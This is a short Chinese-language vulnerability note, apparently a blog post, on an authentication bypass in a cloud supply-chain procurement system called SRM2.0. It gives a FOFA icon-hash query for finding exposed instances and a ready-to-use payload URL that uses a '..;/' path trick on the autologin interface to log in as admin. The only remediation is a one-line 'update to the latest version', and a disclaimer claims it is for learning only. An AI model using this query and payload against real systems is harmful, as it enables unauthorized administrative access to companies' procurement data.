文章目录
免责申明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
搜索语法
fofa
icon_hash="1665918155"
漏洞描述
某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。
该系统在autologin接口处存在权限绕过漏洞
漏洞复现
payload
http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin
修复建议
更新到最新版本